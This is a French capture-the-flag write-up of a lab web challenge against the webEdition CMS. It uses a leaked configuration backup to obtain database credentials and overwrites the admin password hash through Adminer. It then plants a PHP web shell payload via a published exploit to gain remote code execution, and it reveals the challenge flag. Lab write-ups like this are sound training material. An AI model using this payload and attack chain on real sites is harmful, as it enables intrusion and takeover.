# WRITEUP Mehr als nur ein CMS - versprochen !

## Catégorie :

`Web`

## Consigne :

```
Das flexible System für Anwender und Entwickler. Für alle die volle Kontrolle über den Code Ihrer Online-Produkte haben möchten.

Démarrer un environnement virtuel. **Attention** : La durée de vie de l'environnement est limitée

<div>
<button class="btn btn-info" onclick="window.open('/portailvms/29','_blank')" >Accéder au portail</button>
</div>
<p></p>

> Format du flag : fl@g{.....................}
```

## Pièce(s) jointe(s) :

```
Néant
```

## Serveur :

```
PortailVMS
```

## Difficulté :

```
medium
```

## Hint : 

```
- Avez-vous trouvé les sauvegardes des fichiers de configuration ? (5 points)

- Un outil permettant d'administrer les bases de données accessibles à tous n'est jamais vraiment une bonne idée ... (5 points)
```

## Flag :

```
fl@g{~#~GutGemachtDuHastDieFlaggeGefunden~#~}
```

## Solution :

Démarrons un environnement virtuel, une adresse IP nous est attribuée (172.30.100.24 dans mon cas).

On énumère à l'aide de l'outil *dirb*, et le dictionnaire *big.txt*. Nous trouvons, l'arborescence suivante :

```
...
+ http://172.30.100.24/admin/ (CODE:301|SIZE:319)
+ http://172.30.100.24/adminer.php (CODE:200|SIZE:4470)
+ http://172.30.100.24/backup/ (CODE:403|SIZE:278)
+ http://172.30.100.24/backup/conf/ (CODE:403|SIZE:278)
...
```

La page `/admin/` est redirigée (301) vers `/webEdition/`. De plus dans le code source de la page *index.html* : `<!-- webEdition demo template (9.2.2.0) -->`.

Nous savons donc qu'il s'agit du CMS **webEdition** (confirmé en allant sur http://172.30.100.24/webEdition/). 

Si on regarde le code source du CMS, récupérable sur le site de l'éditeur (https://www.webedition.org/), on constate dans le fichier *we/classes/base/we_base_preferences.class.php* qu'un fichier **.bak** est créé à chaque modifications de la configuration :

```php
 static function saveConfigs(): void{
  foreach(self::$config_files as $file){
   if(isset($file['content']) && $file['content'] != $file['contentBak']){ //only save if anything changed
    we_base_file::save($file['filename'] . '.bak', $file['contentBak']);
    we_base_file::save($file['filename'], trim($file['content'], "\n "));
   }
  }
```

Ça tombe bien car je ne peux pas afficher le contenu des fichiers .php (car interprété), mais les fichiers se terminant en .bak pourront être affichés. De plus, on apprend sur ce forum (https://forum.webedition.org/viewtopic.php?t=39955&start=30) que la configuration de l'accès à la BDD se trouve dans le fichier *we_conf.inc.php*.

Enfin, nous avons probablement une sauvegarde de la configuration dans *backup/conf/*.


**Bingo** - Les fichiers http://172.30.100.24/backup/conf/we_conf.inc.php et http://172.30.100.24/backup/conf/we_conf.inc.php.bak existent !!!


Extrait du contenu du fichier *we_conf.inc.php.bak* :

```php
// Domain or IP address of the database server
define("DB_HOST",'localhost');
// Name of database being used by webEdition
define("DB_DATABASE",'webedition');
// Username to access the database
define("DB_USER",base64_decode('d2ViZWRpdGlvbg=='));
// Password to access the database
define("DB_PASSWORD",base64_decode('UXU1eFMwNE1tYk94SXJZMUU='));
```

Nous avons toutes les informations permettant de nous connecter à la base de données.

```bash
echo "d2ViZWRpdGlvbg==" | base64 -d
webedition

echo "UXU1eFMwNE1tYk94SXJZMUU=" | base64 -d
Qu5xS04MmbOxIrY1E
```

 - login : *webedition*
 - mot de passe : *Qu5xS04MmbOxIrY1E*
 - base de données : *webedition*

Nous avons trouvé lors de l'énumération, **adminer.php** (outil pour administrer les bases de données). Nous nous connectons à la base de données.

Je consulte la table contenant la liste des utilisateurs, présence d'un seul compte utilisateur "*admin*".

On constate que le mot de passe est haché **bcrypt** (round=15, prefix='2y'). Un outil permet de créer ses propres *hash* directement sur internet : https://bcrypt.online/

Je modifie le mot de passe actuel de l'utilisateur *admin*, par mon propre mot de passe correctement haché :

```sql
UPDATE `tblUser` SET `passwd` = '$2y$15$RPJHiKStBqW8FvrvyJcXyOXuXJld8MI/NvRtM5aqn1ukFSQ0wfpDq' WHERE `ID` = '1';
```

Je peux maintenant m'authentifier sur l'interface web du CMS.

Un POC existe : https://www.exploit-db.com/exploits/51661

Je créé donc la page `evil.php` comme indiqué, en mettant dans le champ description :

```php
"><?php echo system($_GET['cmd']);?>
```

J'enregistre et je pense à publier la page. Je teste ma charge http://172.30.100.24/evil.php?cmd=id :

```bash
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Cela fonctionne, j'arrive à exécuter du code à distance (RCE) !

Je liste les fichiers dans le répertoire : 172.30.100.24/evil.php?cmd=ls -la :

```
total 532
drwxr-xr-x 1 www-data www-data    186 Jan 19 10:02 .
drwxr-xr-x 1 root     root          8 Jan 17 12:50 ..
-rw-r--r-- 1 root     root        115 Jan 19 07:31 .htaccess
-rw-r--r-- 1 root     root         65 Jan 19 08:28 __FlaGGe__.php
drwxr-xr-x 1 www-data www-data      0 Jan 17 14:23 _thumbnails_
-rw-r--r-- 1     1000     1000 476603 Jan 18 15:14 adminer.php
drwxr-xr-x 1 root     root         44 Jan 18 20:11 backup
-rw-r--r-- 1 www-data www-data    168 Jan 19 10:02 evil.php
-rw-r--r-- 1 www-data www-data    153 Jan 19 07:31 index.html
-rw-r--r-- 1 www-data www-data  46813 Jan 17 14:23 installer.err
drwxr-xr-x 1 www-data www-data    346 Jan 19 07:33 webEdition
drwxr-xr-x 1 www-data www-data    346 Jan 19 07:33 webEdition
```

Présence d'un fichier `__FlaGGe__.php` à la racine du site. J'affiche son contenu et j'ai enfin le flag : `http://172.30.100.24/evil.php?cmd=cat%20__FlaGGe__.php` (afficher le code source, sinon rien ne s'affiche à cause du code interprété par le moteur de rendu html) :

```php
<?php

/*

fl@g{~#~GutGemachtDuHastDieFlaggeGefunden~#~}

*/

?>
```

Voilà, nous avons le flag ;-)
